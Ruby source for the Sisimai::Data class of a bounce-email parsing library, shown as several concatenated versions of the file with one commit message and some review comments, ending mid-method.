        datevalues << e['date'] unless e['date'].to_s.empty?

        # Date information did not exist in message/delivery-status part,...
        RFC822Head[:date].each do |f|
          # Get the value of Date header or other date related header.
          next unless rfc822data[f]
          datevalues << rfc822data[f]
        end

        # Set "date" getting from the value of "Date" in the bounce message
        datevalues << messageobj.header['date'] if datevalues.size < 2

        while v = datevalues.shift do
          # Parse each date value in the array
          datestring = Sisimai::DateTime.parse(v)
          break if datestring
        end

        if datestring && cv = datestring.match(/\A(.+)[ ]+([-+]\d{4})\z/)
          # Get the value of timezone offset from datestring
          # Wed, 26 Feb 2014 06:05:48 -0500
          datestring = cv[1]
          zoneoffset = Sisimai::DateTime.tz2second(cv[2])
          p['timezoneoffset'] = cv[2]
        end

        begin
          # Convert from the date string to an object then calculate time
          # zone offset.
          t = Sisimai::Time.strptime(datestring, '%a, %d %b %Y %T')
          p['timestamp'] = (t.to_time.to_i - zoneoffset) || nil
        rescue
          warn ' ***warning: Failed to strptime ' << datestring.to_s
        end
        next unless p['timestamp']

        # OTHER_TEXT_HEADERS:
        recvheader = data.header['received'] || []
        unless recvheader.empty?
          # Get localhost and remote host name from Received header.
          %w[lhost rhost].each { |a| e[a] ||= '' }
          e['lhost'] = Sisimai::RFC5322.received(recvheader[0]).shift if e['lhost'].empty?
          e['rhost'] = Sisimai::RFC5322.received(recvheader[-1]).pop  if e['rhost'].empty?
        end

        %w[rhost lhost].each do |v|
          p[v].delete!('[]()') # Remove square brackets and round brackets from the host variable
          p[v].sub!(/\A.+=/, '') # Remove string before "="
          p[v].chomp!("\r") if p[v].end_with?("\r") # Remove CR at the end of the value
          # Check space character in each value and get the first element
          p[v] = p[v].split(' ', 2).shift if p[v].include?(' ')
          p[v].chomp!('.') if p[v].end_with?('.') # Remove "." at the end of the value
        end

        # Subject: header of the original message
        p['subject'] = rfc822data['subject'] || ''
        p['subject'].scrub!('?')
        p['subject'].chomp!("\r") if p['subject'].end_with?("\r")

        # The value of "List-Id" header
        p['listid'] = rfc822data['list-id'] || ''
        unless p['listid'].empty?
          # Get the value of List-Id header like "List name <list-id@example.org>"
          if cv = p['listid'].match(/\A.*([<].+[>]).*\z/) then p['listid'] = cv[1] end
          p['listid'].delete!('<>')
          p['listid'].chomp!("\r") if p['listid'].end_with?("\r")
          p['listid'] = '' if p['listid'].include?(' ')
        end

        # The value of "Message-Id" header
        p['messageid'] = rfc822data['message-id'] || ''
        unless p['messageid'].empty?
          # Leave only string inside of angle brackets(<>)
          if cv = p['messageid'].match(/\A([^ ]+)[ ].*/) then p['messageid'] = cv[1] end
          if cv = p['messageid'].match(/[<]([^ ]+?)[>]/) then p['messageid'] = cv[1] end
        end

        # CHECK_DELIVERY_STATUS_VALUE:
        # Cleanup the value of "Diagnostic-Code:" header
        unless p['diagnosticcode'].empty?
          # Count the number of D.S.N. and SMTP Reply Code
          vs = Sisimai::SMTP::Status.find(p['diagnosticcode'])
          vr = Sisimai::SMTP::Reply.find(p['diagnosticcode'])
          vm = 0
          re = nil

          if vs
            # How many times does the D.S.N. appeared
            vm += p['diagnosticcode'].scan(/\b#{vs}\b/).size
            p['deliverystatus'] = vs if vs =~ /\A[45][.][1-9][.][1-9]\z/
          end

          if vr
            # How many times does the SMTP reply code appeared
            vm += p['diagnosticcode'].scan(/\b#{vr}\b/).size
            # NOTE(review): p['replycode'] defaults to '' (truthy), so ||= only
            # assigns when the value is nil — confirm whether .empty? was intended.
            p['replycode'] ||= vr
          end

          if vm > 2
            # Build regular expression for removing string like '550-5.1.1'
            # from the value of "diagnosticcode"
            re = %r/[ ]#{vr}[- ](?:#{vs})?/
            # 550-5.7.1 [192.0.2.222] Our system has detected that this message is
            # 550-5.7.1 likely unsolicited mail. To reduce the amount of spam sent to Gmail,
            # 550-5.7.1 this message has been blocked. Please visit
            # 550 5.7.1 https://support.google.com/mail/answer/188131 for more information.
            p['diagnosticcode'] = Sisimai::String.sweep(p['diagnosticcode'].gsub(re, ' '))
          end
        end
        p['diagnostictype'] ||= 'X-UNIX' if p['reason'] == 'mailererror'
        p['diagnostictype'] ||= 'SMTP' unless %w[feedback vacation].include?(p['reason'])

        # Check the value of SMTP command
        p['smtpcommand'] = '' unless %w[EHLO HELO MAIL RCPT DATA QUIT].include?(p['smtpcommand'])

        if p['action'].empty?
          # Check the value of "action"
          if p['reason'] == 'expired'
            # Action: delayed
            p['action'] = 'delayed'
          elsif p['deliverystatus'].start_with?('5', '4')
            # Action: failed
            p['action'] = 'failed'
          end
        end

        o = Sisimai::Data.new(p)
        next unless o.recipient

        if o.reason.empty? || RetryIndex[o.reason]
          # Decide the reason of email bounce
          r = ''
          r = Sisimai::Rhost.get(o) if Sisimai::Rhost.match(o.rhost) # Remote host dependent error
          r = Sisimai::Reason.get(o) if r.empty?
          r = 'undefined' if r.empty?
          o.reason = r
        end

        if %w[delivered feedback vacation].include?(o.reason)
          # The value of reason is "vacation" or "feedback"
          o.softbounce = -1
          o.replycode = '' unless o.reason == 'delivered'
        else
          # Bounce message which reason is "feedback" or "vacation" does
          # not have the value of "deliverystatus".
          softorhard = nil

          if o.softbounce.to_s.empty?
            # The value is not set yet
            textasargv = (p['deliverystatus'] + ' ' + p['diagnosticcode']).lstrip
            softorhard = Sisimai::SMTP::Error.soft_or_hard(o.reason, textasargv) || ''
            o.softbounce = if softorhard.size > 0
                             # Returned value is "soft" or "hard"
                             (softorhard == 'soft') ? 1 : 0
                           else
                             # Returned value is an empty string
                             -1
                           end
          end

          if o.deliverystatus.empty?
            # Set pseudo status code
            textasargv = (o.replycode + ' ' + p['diagnosticcode']).lstrip
            getchecked = Sisimai::SMTP::Error.is_permanent(textasargv)
            tmpfailure = getchecked.nil? ? false : (getchecked ? false : true)

            if pseudocode = Sisimai::SMTP::Status.code(o.reason, tmpfailure)
              # Set the value of "deliverystatus" and "softbounce"
              o.deliverystatus = pseudocode
              if o.softbounce < 0
                # set the value of "softbounce" again when the value is -1
                softorhard = Sisimai::SMTP::Error.soft_or_hard(o.reason, pseudocode)
                o.softbounce = if softorhard.size > 0
                                 # Returned value is "soft" or "hard"
                                 softorhard == 'soft' ? 1 : 0
                               else
                                 # Returned value is an empty string
                                 -1
                               end
              end
            end
          end

          unless o.replycode.empty?
            # Check both of the first digit of "deliverystatus" and "replycode"
            o.replycode = '' unless o.replycode[0, 1] == o.deliverystatus[0, 1]
          end
        end
        objectlist << o
      end
      return objectlist
    end

    # Convert from object to hash reference
    # @return   [Hash] Data in Hash reference
    def damn
      data = {}
      @@rwaccessors.each do |e|
        next if %w[addresser recipient timestamp].include?(e.to_s)
        data[e.to_s] = self.send(e) || ''
      end
      data['addresser'] = self.addresser.address
      data['recipient'] = self.recipient.address
      data['timestamp'] = self.timestamp.to_time.to_i
      return data
    end
    alias :to_hash :damn

    # Data dumper
    # @param    [String] type   Data format: json, yaml
    # @return   [String, Nil]   Dumped data or nil if the value of the first
    #                           argument is neither "json" nor "yaml"
    def dump(type = 'json')
      return nil unless %w[json yaml].include?(type)
      referclass = 'Sisimai::Data::' << type.upcase

      begin
        require referclass.downcase.gsub('::', '/')
      rescue
        warn '***warning: Failed to load' << referclass
      end

      dumpeddata = Module.const_get(referclass).dump(self)
      return dumpeddata
    end

    # JSON handler
    # @return   [String] JSON string converted from Sisimai::Data
    def to_json(*)
      return self.dump('json')
    end
  end
end
# ----------------------------------------------------------------------
module Sisimai
# Sisimai::Data generate parsed data from Sisimai::Message object.
class Data
# Imported from p5-Sisimail/lib/Sisimai/Data.pm
require 'sisimai/address'
require 'sisimai/rfc5322'
require 'sisimai/smtp/reply'
require 'sisimai/smtp/status'
require 'sisimai/string'
require 'sisimai/reason'
require 'sisimai/rhost'
require 'sisimai/time'
require 'sisimai/datetime'
# Accessor catalogue: one read/write attribute is generated per entry.
# NOTE(review): @@rwaccessors is a class variable (shared across any
# subclasses); a class-instance variable would be safer if Data is ever
# subclassed.
@@rwaccessors = [
  :token, # [String] Message token/MD5 Hex digest value
  :lhost, # [String] local host name/Local MTA
  :rhost, # [String] Remote host name/Remote MTA
  :alias, # [String] Alias of the recipient address
  :listid, # [String] List-Id header of each ML
  :reason, # [String] Bounce reason
  :action, # [String] The value of Action: header
  :subject, # [String] UTF-8 Subject text
  :timestamp, # [Sisimai::Time] Date: header in the original message
  :addresser, # [Sisimai::Address] From address
  :recipient, # [Sisimai::Address] Recipient address which bounced
  :messageid, # [String] Message-Id: header
  :replycode, # [String] SMTP Reply Code
  :smtpagent, # [String] MTA name
  :softbounce, # [Integer] 1 = Soft bounce, 0 = Hard bounce, -1 = ?
  :smtpcommand, # [String] The last SMTP command
  :destination, # [String] The domain part of the "recipient"
  :senderdomain, # [String] The domain part of the "addresser"
  :feedbacktype, # [String] Feedback Type
  :diagnosticcode, # [String] Diagnostic-Code: Header
  :diagnostictype, # [String] The 1st part of Diagnostic-Code: Header
  :deliverystatus, # [String] Delivery Status(DSN)
  :timezoneoffset, # [Integer] Time zone offset(seconds)
]
@@rwaccessors.each { |e| attr_accessor e }
# Sentinel appended at the end of parsed mail text
EndOfEmail = Sisimai::String.EOM
# Bounce reasons that are worth re-evaluating via Sisimai::Reason.get
RetryIndex = Sisimai::Reason.retry
RFC822Head = Sisimai::RFC5322.HEADERFIELDS('all')
# Default header-scan order for each address-bearing accessor
AddrHeader = {
  'addresser' => RFC822Head['addresser'],
  'recipient' => RFC822Head['recipient'],
}
# Constructor of Sisimai::Data
# @param [Hash] argvs Data
# @return [Sisimai::Data] Structured email data
def initialize(argvs)
  # Build a structured bounce-data object from a String-keyed parameter
  # Hash assembled by Sisimai::Data.make.
  thing = {}
  # Create email address object
  x0 = Sisimai::Address.parse([argvs['addresser']])
  y0 = Sisimai::Address.parse([argvs['recipient']])
  v0 = nil
  if x0.is_a? Array
    v0 = Sisimai::Address.new(x0.shift)
    if v0.is_a? Sisimai::Address
      thing['addresser'] = v0
      thing['senderdomain'] = v0.host
    end
  end
  if y0.is_a? Array
    v0 = Sisimai::Address.new(y0.shift)
    if v0.is_a? Sisimai::Address
      thing['recipient'] = v0
      thing['destination'] = v0.host
      thing['alias'] = argvs['alias'] || ''
    end
  end
  # NOTE(review): "return nil" inside #initialize does not stop object
  # allocation — .new still returns an instance with unset ivars; callers
  # in self.make guard on o.recipient afterwards. Confirm this is intended.
  return nil unless thing['recipient'].is_a? Sisimai::Address
  return nil unless thing['addresser'].is_a? Sisimai::Address
  return nil if thing['recipient'].void
  return nil if thing['addresser'].void
  @addresser = thing['addresser']
  @senderdomain = thing['senderdomain']
  @recipient = thing['recipient']
  @destination = thing['destination']
  @alias = thing['alias']
  @token = Sisimai::String.token(@addresser.address, @recipient.address, argvs['timestamp'])
  @timestamp = Sisimai::Time.parse(::Time.at(argvs['timestamp']).to_s)
  # NOTE(review): defaults to the String '+0000' although the accessor is
  # documented as an Integer offset in seconds — verify downstream users.
  @timezoneoffset = argvs['timezoneoffset'] || '+0000'
  @lhost = argvs['lhost'] || ''
  @rhost = argvs['rhost'] || ''
  @reason = argvs['reason'] || ''
  @listid = argvs['listid'] || ''
  @subject = argvs['subject'] || ''
  @messageid = argvs['messageid'] || ''
  @smtpagent = argvs['smtpagent'] || ''
  @diagnosticcode = argvs['diagnosticcode'] || ''
  @diagnostictype = argvs['diagnostictype'] || ''
  @deliverystatus = argvs['deliverystatus'] || ''
  @smtpcommand = argvs['smtpcommand'] || ''
  @feedbacktype = argvs['feedbacktype'] || ''
  @action = argvs['action'] || ''
  @replycode = Sisimai::SMTP::Reply.find(argvs['diagnosticcode'])
  @softbounce = argvs['softbounce'] || ''
  # A 4xx SMTP reply code always means a soft bounce
  @softbounce = 1 if @replycode =~ /\A4/
end
# Another constructor of Sisimai::Data
# @param [Hash] argvs Data and orders
# @option argvs [Sisimai::Message] Data Object
# @return [Array, Undef] List of Sisimai::Data or Undef if the
# argument is not Sisimai::Message object
def self.make(data: nil, **argvs)
  # Build a list of Sisimai::Data objects from a parsed Sisimai::Message.
  # Returns nil when "data" is missing or not a Sisimai::Message or lacks
  # delivery-status/rfc822 parts; otherwise an Array (possibly empty).
  return nil unless data
  return nil unless data.is_a? Sisimai::Message
  messageobj = data
  rfc822data = messageobj.rfc822
  # Header names to scan for each address; filled from the caller's
  # "order" option below, or from the AddrHeader defaults.
  fieldorder = { 'recipient' => [], 'addresser' => [] }
  objectlist = []
  rxcommands = %r/\A(?:EHLO|HELO|MAIL|RCPT|DATA|QUIT)\z/
  # NOTE(review): **argvs stores keyword arguments under Symbol keys, so
  # this String-key lookup appears to always yield nil (the {} default) —
  # confirm how callers are expected to pass the "order" option.
  givenorder = argvs['order'] || {}
  return nil unless messageobj.ds
  return nil unless messageobj.rfc822
  require 'sisimai/smtp'
  # Decide the order of email headers: user specified or system default.
  if givenorder.is_a?(Hash) && givenorder.keys.size > 0
    # If the order of headers for searching is specified, use the order
    # for detecting an email address.
    fieldorder.each_key do |e|
      # The order should be "Array Reference".
      next unless givenorder[e]
      next unless givenorder[e].is_a? Array
      next unless givenorder[e].size > 0
      fieldorder[e].concat(givenorder[e])
    end
  end
  fieldorder.each_key do |e|
    # If the order is empty, use default order.
    if fieldorder[e].empty?
      # Load default order of each accessor.
      fieldorder[e] = AddrHeader[e]
    end
  end
  messageobj.ds.each do |e|
    # Create parameters for new() constructor.
    o = nil # Sisimai::Data Object
    r = nil # Reason text
    p = {
      'lhost' => e['lhost'] || '',
      'rhost' => e['rhost'] || '',
      'alias' => e['alias'] || '',
      'action' => e['action'] || '',
      'reason' => e['reason'] || '',
      'smtpagent' => e['agent'] || '',
      'recipient' => e['recipient'] || '',
      'softbounce' => e['softbounce'] || '',
      'smtpcommand' => e['command'] || '',
      'feedbacktype' => e['feedbacktype'] || '',
      'diagnosticcode' => e['diagnosis'] || '',
      'diagnostictype' => e['spec'] || '',
      'deliverystatus' => e['status'] || '',
    }
    # Skip successful deliveries (2.X.X delivery status)
    next if p['deliverystatus'] =~ /\A2[.]/
    # EMAIL_ADDRESS:
    # Detect email address from message/rfc822 part
    fieldorder['addresser'].each do |f|
      # Check each header in message/rfc822 part
      h = f.downcase
      next unless rfc822data.key?(h)
      next unless rfc822data[h].size > 0
      next unless Sisimai::RFC5322.is_emailaddress(rfc822data[h])
      p['addresser'] = rfc822data[h]
      break
    end
    # Fallback: Get the sender address from the header of the bounced
    # email if the address is not set at loop above.
    p['addresser'] ||= ''
    p['addresser'] = messageobj.header['to'] if p['addresser'].empty?
    if p['alias'] && Sisimai::RFC5322.is_emailaddress(p['alias'])
      # Alias address should be the value of "recipient", Replace the
      # value of recipient with the value of "alias".
      w = p['recipient']
      p['recipient'] = p['alias']
      p['alias'] = w
    end
    next unless p['addresser']
    next unless p['recipient']
    # TIMESTAMP:
    # Convert from a time stamp or a date string to a machine time.
    datestring = nil
    zoneoffset = 0
    datevalues = []
    if e['date'] && e['date'].size > 0
      datevalues << e['date']
    end
    # Date information did not exist in message/delivery-status part,...
    RFC822Head['date'].each do |f|
      # Get the value of Date header or other date related header.
      next unless rfc822data[f.downcase]
      datevalues << rfc822data[f.downcase]
    end
    if datevalues.size < 2
      # Set "date" getting from the value of "Date" in the bounce message
      datevalues << messageobj.header['date']
    end
    datevalues.each do |v|
      # Parse each date value in the array
      datestring = Sisimai::DateTime.parse(v)
      break if datestring
    end
    if datestring
      # Get the value of timezone offset from $datestring
      if cv = datestring.match(/\A(.+)[ ]+([-+]\d{4})\z/)
        # Wed, 26 Feb 2014 06:05:48 -0500
        datestring = cv[1]
        zoneoffset = Sisimai::DateTime.tz2second(cv[2])
        p['timezoneoffset'] = cv[2]
      end
    end
    begin
      # Convert from the date string to an object then calculate time
      # zone offset.
      t = Sisimai::Time.strptime(datestring, '%a, %d %b %Y %T')
      p['timestamp'] = (t.to_time.to_i - zoneoffset) || nil
    rescue
      warn ' ***warning: Failed to strptime ' + datestring.to_s
    end
    # A record without a parseable timestamp cannot become a Data object
    next unless p['timestamp']
    # OTHER_TEXT_HEADERS:
    # Remove square brackets and curly brackets from the host variable
    %w|rhost lhost|.each do |v|
      p[v] = p[v].delete('[]()') # Remove square brackets and curly brackets from the host variable
      p[v] = p[v].sub(/\A.+=/, '') # Remove string before "="
      p[v] = p[v].gsub(/\r\z/, '') # Remove CR at the end of the value
      # Check space character in each value
      if p[v] =~ / /
        # Get the first element
        p[v] = p[v].split(' ', 2).shift
      end
    end
    # Subject: header of the original message
    p['subject'] = rfc822data['subject'] || ''
    p['subject'] = p['subject'].gsub(/\r\z/, '')
    # The value of "List-Id" header
    p['listid'] = rfc822data['list-id'] || ''
    if p['listid'].size > 0
      # Get the value of List-Id header
      if cv = p['listid'].match(/\A.*([<].+[>]).*\z/)
        # List name <list-id@example.org>
        p['listid'] = cv[1]
      end
      p['listid'] = p['listid'].delete('<>')
      p['listid'] = p['listid'].gsub(/\r\z/, '')
      p['listid'] = '' if p['listid'] =~ / /
    end
    # The value of "Message-Id" header
    p['messageid'] = rfc822data['message-id'] || ''
    if p['messageid'].size > 0
      # Remove angle brackets
      if cv = p['messageid'].match(/\A([^ ]+)[ ].*/)
        p['messageid'] = cv[1]
      end
      p['messageid'] = p['messageid'].delete('<>')
      p['messageid'] = p['messageid'].gsub(/\r\z/, '')
    end
    # CHECK_DELIVERY_STATUS_VALUE:
    # Cleanup the value of "Diagnostic-Code:" header
    p['diagnosticcode'] = p['diagnosticcode'].sub(/[ \t]+#{EndOfEmail}/, '')
    d = Sisimai::SMTP::Status.find(p['diagnosticcode'])
    if d =~ /\A[45][.][1-9][.][1-9]\z/
      # Use the DSN value in Diagnostic-Code:
      p['deliverystatus'] = d
    end
    # Check the value of SMTP command
    p['smtpcommand'] = '' unless p['smtpcommand'] =~ rxcommands
    o = Sisimai::Data.new(p)
    next unless o.recipient
    if o.reason.empty? || RetryIndex.index(o.reason)
      # Decide the reason of email bounce
      r = ''
      if Sisimai::Rhost.match(o.rhost)
        # Remote host dependent error
        r = Sisimai::Rhost.get(o)
      end
      r = Sisimai::Reason.get(o) if r.empty?
      r = 'undefined' if r.empty?
      o.reason = r
    end
    if o.reason != 'feedback' && o.reason != 'vacation'
      # Bounce message which reason is "feedback" or "vacation" does
      # not have the value of "deliverystatus".
      if o.softbounce.to_s.empty?
        # The value is not set yet
        %w|deliverystatus diagnosticcode|.each do |v|
          # Set the value of softbounce
          next unless p[v].size > 0
          r = Sisimai::SMTP.is_softbounce(p[v])
          if r.nil?
            o.softbounce = -1
          else
            o.softbounce = r ? 1 : 0
          end
          break if o.softbounce > -1
        end
        o.softbounce = -1 if o.softbounce.to_s.empty?
      end
      if o.deliverystatus.empty?
        # Set pseudo status code
        torp = o.softbounce == 1 ? true : false
        pdsv = Sisimai::SMTP::Status.code(o.reason, torp)
        if pdsv.size > 0
          # Set the value of "deliverystatus" and "softbounce".
          o.deliverystatus = pdsv
          if o.softbounce == -1
            # Check the value of "softbounce" again
            torp = Sisimai::SMTP.is_softbounce(pdsv)
            if torp.nil?
              o.softbounce = -1
            else
              o.softbounce = torp ? 1 : 0
            end
          end
        end
      end
    else
      # The value of reason is "vacation" or "feedback"
      o.softbounce = -1
    end
    objectlist << o
  end
  return objectlist
end
# Convert from object to hash reference
# @return [Hash] Data in Hash reference
# Flatten this object into a String-keyed Hash; returns nil (after
# printing a warning) when any accessor raises.
def damn
  hashed = nil
  begin
    scalarkeys = %w[
      token lhost rhost listid alias reason subject messageid smtpagent
      smtpcommand destination diagnosticcode senderdomain deliverystatus
      timezoneoffset feedbacktype diagnostictype action replycode softbounce
    ]
    # Copy each scalar accessor, defaulting nil to an empty string
    hashed = scalarkeys.each_with_object({}) { |key, acc| acc[key] = send(key) || '' }
    # Address objects and the timestamp are reduced to primitives
    hashed['addresser'] = addresser.address
    hashed['recipient'] = recipient.address
    hashed['timestamp'] = timestamp.to_time.to_i
  rescue
    warn '***warning: Failed to damn()'
    hashed = nil
  end
  return hashed
end
# Data dumper
# @param [String] type Data format: json, yaml
# @return [String, Undef] Dumped data or Undef if the value of first
# argument is neither "json" nor "yaml"
# Serialize this object.
# @param [String] type Data format: "json" or "yaml"
# @return [String, nil] Dumped data, or nil when type is neither "json"
#   nor "yaml"
def dump(type = 'json')
  return nil unless %w[json yaml].include?(type)
  referclass = sprintf('Sisimai::Data::%s', type.upcase)
  begin
    require referclass.downcase.gsub('::', '/')
  rescue LoadError
    # A bare "rescue" only catches StandardError; a failed require raises
    # LoadError (a ScriptError), so it must be named explicitly here or
    # the warning below can never fire.
    warn '***warning: Failed to load ' + referclass
  end
  dumpeddata = Module.const_get(referclass).dump(self)
  return dumpeddata
end
# Flatten this object into a String-keyed Hash; unlike #damn, address
# values are stringified with #to_s and no error handling is performed.
def to_hash
  excluded = %w[addresser recipient timestamp]
  hashed = {}
  @@rwaccessors.each do |accessor|
    key = accessor.to_s
    next if excluded.include?(key)
    hashed[key] = send(accessor)
  end
  hashed['addresser'] = addresser.to_s
  hashed['recipient'] = recipient.to_s
  hashed['timestamp'] = timestamp.to_time.to_i
  return hashed
end
end
end
Improved Sisimai::Data#damn, set alias to "damn" as "to_hash", issue #42
module Sisimai
# Sisimai::Data generate parsed data from Sisimai::Message object.
class Data
# Imported from p5-Sisimail/lib/Sisimai/Data.pm
require 'sisimai/address'
require 'sisimai/rfc5322'
require 'sisimai/smtp/reply'
require 'sisimai/smtp/status'
require 'sisimai/string'
require 'sisimai/reason'
require 'sisimai/rhost'
require 'sisimai/time'
require 'sisimai/datetime'
# Accessor catalogue: one read/write attribute is generated per entry.
# NOTE(review): @@rwaccessors is a class variable (shared across any
# subclasses); a class-instance variable would be safer if Data is ever
# subclassed.
@@rwaccessors = [
  :token, # [String] Message token/MD5 Hex digest value
  :lhost, # [String] local host name/Local MTA
  :rhost, # [String] Remote host name/Remote MTA
  :alias, # [String] Alias of the recipient address
  :listid, # [String] List-Id header of each ML
  :reason, # [String] Bounce reason
  :action, # [String] The value of Action: header
  :subject, # [String] UTF-8 Subject text
  :timestamp, # [Sisimai::Time] Date: header in the original message
  :addresser, # [Sisimai::Address] From address
  :recipient, # [Sisimai::Address] Recipient address which bounced
  :messageid, # [String] Message-Id: header
  :replycode, # [String] SMTP Reply Code
  :smtpagent, # [String] MTA name
  :softbounce, # [Integer] 1 = Soft bounce, 0 = Hard bounce, -1 = ?
  :smtpcommand, # [String] The last SMTP command
  :destination, # [String] The domain part of the "recipient"
  :senderdomain, # [String] The domain part of the "addresser"
  :feedbacktype, # [String] Feedback Type
  :diagnosticcode, # [String] Diagnostic-Code: Header
  :diagnostictype, # [String] The 1st part of Diagnostic-Code: Header
  :deliverystatus, # [String] Delivery Status(DSN)
  :timezoneoffset, # [Integer] Time zone offset(seconds)
]
@@rwaccessors.each { |e| attr_accessor e }
# Sentinel appended at the end of parsed mail text
EndOfEmail = Sisimai::String.EOM
# Bounce reasons that are worth re-evaluating via Sisimai::Reason.get
RetryIndex = Sisimai::Reason.retry
RFC822Head = Sisimai::RFC5322.HEADERFIELDS('all')
# Default header-scan order for each address-bearing accessor
AddrHeader = {
  'addresser' => RFC822Head['addresser'],
  'recipient' => RFC822Head['recipient'],
}
# Constructor of Sisimai::Data
# @param [Hash] argvs Data
# @return [Sisimai::Data] Structured email data
def initialize(argvs)
  # Build a structured bounce-data object from a String-keyed parameter
  # Hash assembled by Sisimai::Data.make.
  thing = {}
  # Create email address object
  x0 = Sisimai::Address.parse([argvs['addresser']])
  y0 = Sisimai::Address.parse([argvs['recipient']])
  v0 = nil
  if x0.is_a? Array
    v0 = Sisimai::Address.new(x0.shift)
    if v0.is_a? Sisimai::Address
      thing['addresser'] = v0
      thing['senderdomain'] = v0.host
    end
  end
  if y0.is_a? Array
    v0 = Sisimai::Address.new(y0.shift)
    if v0.is_a? Sisimai::Address
      thing['recipient'] = v0
      thing['destination'] = v0.host
      thing['alias'] = argvs['alias'] || ''
    end
  end
  # NOTE(review): "return nil" inside #initialize does not stop object
  # allocation — .new still returns an instance with unset ivars; callers
  # in self.make guard on o.recipient afterwards. Confirm this is intended.
  return nil unless thing['recipient'].is_a? Sisimai::Address
  return nil unless thing['addresser'].is_a? Sisimai::Address
  return nil if thing['recipient'].void
  return nil if thing['addresser'].void
  @addresser = thing['addresser']
  @senderdomain = thing['senderdomain']
  @recipient = thing['recipient']
  @destination = thing['destination']
  @alias = thing['alias']
  @token = Sisimai::String.token(@addresser.address, @recipient.address, argvs['timestamp'])
  @timestamp = Sisimai::Time.parse(::Time.at(argvs['timestamp']).to_s)
  # NOTE(review): defaults to the String '+0000' although the accessor is
  # documented as an Integer offset in seconds — verify downstream users.
  @timezoneoffset = argvs['timezoneoffset'] || '+0000'
  @lhost = argvs['lhost'] || ''
  @rhost = argvs['rhost'] || ''
  @reason = argvs['reason'] || ''
  @listid = argvs['listid'] || ''
  @subject = argvs['subject'] || ''
  @messageid = argvs['messageid'] || ''
  @smtpagent = argvs['smtpagent'] || ''
  @diagnosticcode = argvs['diagnosticcode'] || ''
  @diagnostictype = argvs['diagnostictype'] || ''
  @deliverystatus = argvs['deliverystatus'] || ''
  @smtpcommand = argvs['smtpcommand'] || ''
  @feedbacktype = argvs['feedbacktype'] || ''
  @action = argvs['action'] || ''
  @replycode = Sisimai::SMTP::Reply.find(argvs['diagnosticcode'])
  @softbounce = argvs['softbounce'] || ''
  # A 4xx SMTP reply code always means a soft bounce
  @softbounce = 1 if @replycode =~ /\A4/
end
# Another constructor of Sisimai::Data
# @param [Hash] argvs Data and orders
# @option argvs [Sisimai::Message] Data Object
# @return [Array, Undef] List of Sisimai::Data or Undef if the
# argument is not Sisimai::Message object
def self.make(data: nil, **argvs)
  # Build a list of Sisimai::Data objects from a parsed Sisimai::Message.
  # Returns nil when "data" is missing or not a Sisimai::Message or lacks
  # delivery-status/rfc822 parts; otherwise an Array (possibly empty).
  return nil unless data
  return nil unless data.is_a? Sisimai::Message
  messageobj = data
  rfc822data = messageobj.rfc822
  # Header names to scan for each address; filled from the caller's
  # "order" option below, or from the AddrHeader defaults.
  fieldorder = { 'recipient' => [], 'addresser' => [] }
  objectlist = []
  rxcommands = %r/\A(?:EHLO|HELO|MAIL|RCPT|DATA|QUIT)\z/
  # NOTE(review): **argvs stores keyword arguments under Symbol keys, so
  # this String-key lookup appears to always yield nil (the {} default) —
  # confirm how callers are expected to pass the "order" option.
  givenorder = argvs['order'] || {}
  return nil unless messageobj.ds
  return nil unless messageobj.rfc822
  require 'sisimai/smtp'
  # Decide the order of email headers: user specified or system default.
  if givenorder.is_a?(Hash) && givenorder.keys.size > 0
    # If the order of headers for searching is specified, use the order
    # for detecting an email address.
    fieldorder.each_key do |e|
      # The order should be "Array Reference".
      next unless givenorder[e]
      next unless givenorder[e].is_a? Array
      next unless givenorder[e].size > 0
      fieldorder[e].concat(givenorder[e])
    end
  end
  fieldorder.each_key do |e|
    # If the order is empty, use default order.
    if fieldorder[e].empty?
      # Load default order of each accessor.
      fieldorder[e] = AddrHeader[e]
    end
  end
  messageobj.ds.each do |e|
    # Create parameters for new() constructor.
    o = nil # Sisimai::Data Object
    r = nil # Reason text
    p = {
      'lhost' => e['lhost'] || '',
      'rhost' => e['rhost'] || '',
      'alias' => e['alias'] || '',
      'action' => e['action'] || '',
      'reason' => e['reason'] || '',
      'smtpagent' => e['agent'] || '',
      'recipient' => e['recipient'] || '',
      'softbounce' => e['softbounce'] || '',
      'smtpcommand' => e['command'] || '',
      'feedbacktype' => e['feedbacktype'] || '',
      'diagnosticcode' => e['diagnosis'] || '',
      'diagnostictype' => e['spec'] || '',
      'deliverystatus' => e['status'] || '',
    }
    # Skip successful deliveries (2.X.X delivery status)
    next if p['deliverystatus'] =~ /\A2[.]/
    # EMAIL_ADDRESS:
    # Detect email address from message/rfc822 part
    fieldorder['addresser'].each do |f|
      # Check each header in message/rfc822 part
      h = f.downcase
      next unless rfc822data.key?(h)
      next unless rfc822data[h].size > 0
      next unless Sisimai::RFC5322.is_emailaddress(rfc822data[h])
      p['addresser'] = rfc822data[h]
      break
    end
    # Fallback: Get the sender address from the header of the bounced
    # email if the address is not set at loop above.
    p['addresser'] ||= ''
    p['addresser'] = messageobj.header['to'] if p['addresser'].empty?
    if p['alias'] && Sisimai::RFC5322.is_emailaddress(p['alias'])
      # Alias address should be the value of "recipient", Replace the
      # value of recipient with the value of "alias".
      w = p['recipient']
      p['recipient'] = p['alias']
      p['alias'] = w
    end
    next unless p['addresser']
    next unless p['recipient']
    # TIMESTAMP:
    # Convert from a time stamp or a date string to a machine time.
    datestring = nil
    zoneoffset = 0
    datevalues = []
    if e['date'] && e['date'].size > 0
      datevalues << e['date']
    end
    # Date information did not exist in message/delivery-status part,...
    RFC822Head['date'].each do |f|
      # Get the value of Date header or other date related header.
      next unless rfc822data[f.downcase]
      datevalues << rfc822data[f.downcase]
    end
    if datevalues.size < 2
      # Set "date" getting from the value of "Date" in the bounce message
      datevalues << messageobj.header['date']
    end
    datevalues.each do |v|
      # Parse each date value in the array
      datestring = Sisimai::DateTime.parse(v)
      break if datestring
    end
    if datestring
      # Get the value of timezone offset from $datestring
      if cv = datestring.match(/\A(.+)[ ]+([-+]\d{4})\z/)
        # Wed, 26 Feb 2014 06:05:48 -0500
        datestring = cv[1]
        zoneoffset = Sisimai::DateTime.tz2second(cv[2])
        p['timezoneoffset'] = cv[2]
      end
    end
    begin
      # Convert from the date string to an object then calculate time
      # zone offset.
      t = Sisimai::Time.strptime(datestring, '%a, %d %b %Y %T')
      p['timestamp'] = (t.to_time.to_i - zoneoffset) || nil
    rescue
      warn ' ***warning: Failed to strptime ' + datestring.to_s
    end
    # A record without a parseable timestamp cannot become a Data object
    next unless p['timestamp']
    # OTHER_TEXT_HEADERS:
    # Remove square brackets and curly brackets from the host variable
    %w|rhost lhost|.each do |v|
